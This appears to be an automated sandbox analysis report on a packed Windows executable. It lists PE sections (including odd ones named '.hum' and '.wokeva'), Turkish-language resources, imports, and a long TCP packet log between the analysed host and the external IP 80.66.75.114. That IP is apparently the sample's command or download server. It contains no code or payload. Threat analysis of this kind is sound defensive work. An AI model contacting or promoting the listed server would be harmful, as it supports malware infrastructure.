IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2c3f8 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2c3b0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x184 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2969f | 0x29800 | bceac93c4383f3ad93868796229e2ac0 | False | 0.9116034450301205 | data | 7.8387433799683475 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x1fa0 | 0x2000 | 0539a36248b9ffd558685ef0e7254109 | False | 0.368408203125 | data | 5.57966054423769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2d000 | 0xda67c | 0x1400 | b0002943268b08943d1ebe30ef299a8d | False | 0.16875 | data | 1.8255554986568536 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.hum | 0x108000 | 0x7c | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x109000 | 0x51d | 0x600 | d00a0884dfc2593613905d91d2ea3f37 | False | 0.015625 | data | 0.007830200398677895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wokeva | 0x10a000 | 0x400 | 0x400 | 0f343b0931126a20f133d67c2b018a3b | False | 0.0166015625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x10b000 | 0x1d348 | 0x1d400 | 4aa5b0a14a2e288b4c7948fe6ea66253 | False | 0.6008279914529915 | data | 6.057342974563368 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x123558 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
RT_ICON | 0x10ba30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5711620469083155
RT_ICON | 0x10c8d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.641245487364621
RT_ICON | 0x10d180 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6941244239631337
RT_ICON | 0x10d848 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7514450867052023
RT_ICON | 0x10ddb0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5196058091286307
RT_ICON | 0x110358 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.62406191369606
RT_ICON | 0x111400 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.6311475409836066
RT_ICON | 0x111d88 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7659574468085106
RT_ICON | 0x112268 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.8073027718550106
RT_ICON | 0x113110 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.7757220216606499
RT_ICON | 0x1139b8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.7309907834101382
RT_ICON | 0x114080 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7326589595375722
RT_ICON | 0x1145e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.683195020746888
RT_ICON | 0x116b90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.7340525328330206
RT_ICON | 0x117c38 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.7688524590163934
RT_ICON | 0x1185c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.800531914893617
RT_ICON | 0x118aa0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39792110874200426
RT_ICON | 0x119948 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5591155234657039
RT_ICON | 0x11a1f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6169354838709677
RT_ICON | 0x11a8b8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6416184971098265
RT_ICON | 0x11ae20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.43550656660412757
RT_ICON | 0x11bec8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.42991803278688523
RT_ICON | 0x11c850 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.47606382978723405
RT_ICON | 0x11cd20 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.8073027718550106
RT_ICON | 0x11dbc8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.7757220216606499
RT_ICON | 0x11e470 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.7309907834101382
RT_ICON | 0x11eb38 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7326589595375722
RT_ICON | 0x11f0a0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.683195020746888
RT_ICON | 0x121648 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.7340525328330206
RT_ICON | 0x1226f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.7688524590163934
RT_ICON | 0x123078 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.800531914893617
RT_STRING | 0x123860 | 0x476 | data | | | 0.44921190893169877
RT_STRING | 0x123cd8 | 0x504 | data | | | 0.45794392523364486
RT_STRING | 0x1241e0 | 0x6b4 | data | | | 0.4324009324009324
RT_STRING | 0x124898 | 0x760 | data | | | 0.4253177966101695
RT_STRING | 0x124ff8 | 0x706 | data | | | 0.42880978865406005
RT_STRING | 0x125700 | 0x8b8 | data | | | 0.4211469534050179
RT_STRING | 0x125fb8 | 0x6d2 | data | | | 0.4306987399770905
RT_STRING | 0x126690 | 0x4a4 | data | | | 0.46380471380471383
RT_STRING | 0x126b38 | 0x62e | data | | | 0.4361567635903919
RT_STRING | 0x127168 | 0x520 | data | | | 0.45198170731707316
RT_STRING | 0x127688 | 0x722 | data | | | 0.4244249726177437
RT_STRING | 0x127db0 | 0x564 | data | | | 0.4391304347826087
RT_STRING | 0x128318 | 0x2e | data | | | 0.6304347826086957
RT_GROUP_CURSOR | 0x123688 | 0x14 | data | | | 1.15
RT_GROUP_ICON | 0x118a28 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x1234e0 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x1121f0 | 0x76 | data | Turkish | Turkey | 0.6610169491525424
RT_GROUP_ICON | 0x11ccb8 | 0x68 | data | Turkish | Turkey | 0.7211538461538461
RT_VERSION | 0x1236a0 | 0x1bc | data | | | 0.581081081081081
DLL | Import
KERNEL32.dll | SearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, FormatMessageW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeA, ReleaseSemaphore, GetShortPathNameA, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
USER32.dll | SetFocus
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Oct 8, 2024 10:08:11.286109924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286123991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286139965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286154985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286173105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286228895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286228895 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286230087 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286370039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286384106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286400080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286413908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286423922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286429882 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286446095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286453009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286468983 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286474943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286495924 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286521912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286736965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286752939 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286788940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286806107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286808968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286822081 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286837101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.286866903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286866903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.286900997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287198067 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287224054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287240028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287250042 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287265062 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.287276030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287276030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.287318945 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425695896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425811052 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425811052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425825119 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.425903082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.425903082 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.445183039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:11.450366974 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.692985058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:11.693078041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:13.740324020 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:13.746249914 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:13.987679958 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:13.987761974 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:16.021287918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:16.026304007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:16.262528896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:16.263030052 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:18.302316904 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:18.307243109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:18.550729036 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:18.550919056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:20.583638906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:20.589128017 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:20.835737944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:20.835807085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:22.864959002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:22.870486975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:23.123287916 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:23.123426914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:25.146970034 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:25.151943922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:25.395947933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:25.396051884 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:27.427881002 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:27.433166981 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:27.661278009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:27.661408901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:29.693419933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:29.731981039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:29.976442099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:29.976639032 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:32.015285969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:32.021162033 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:32.253798962 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:32.253902912 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:34.271671057 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:34.276679993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:34.964449883 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:34.964772940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.037252903 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.042449951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298378944 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298403978 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298415899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298420906 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298430920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298435926 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298441887 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298446894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298451900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298460007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298516035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298563004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298605919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298615932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298624992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298650026 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298675060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440593004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440663099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440697908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440731049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440752029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440766096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440788031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440799952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440824986 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440843105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440851927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440886021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440907955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440918922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440941095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440952063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440963030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440999985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441005945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441037893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441055059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441071987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441088915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441104889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441128969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441148996 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441155910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441188097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441204071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441226006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441236019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441257954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441273928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441292048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441310883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441324949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441344976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441358089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441380024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441397905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441401958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441446066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441679955 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441740990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565191031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565215111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565224886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565275908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565287113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565298080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565380096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565380096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565552950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565565109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565576077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565586090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565592051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565603018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565613985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565617085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565623999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565639019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565664053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565692902 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565890074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565901995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565912008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565947056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565980911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566063881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566076040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566086054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566097021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566124916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566154957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566191912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566203117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566214085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566247940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566278934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566782951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566793919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566803932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566840887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566870928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566936016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566989899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566992998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567001104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567013025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567023039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567039967 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567070007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567097902 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.699902058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.699954987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700014114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700047970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700083017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700100899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700134993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700154066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700154066 CEST4973080192.168.2.480.66.75.114
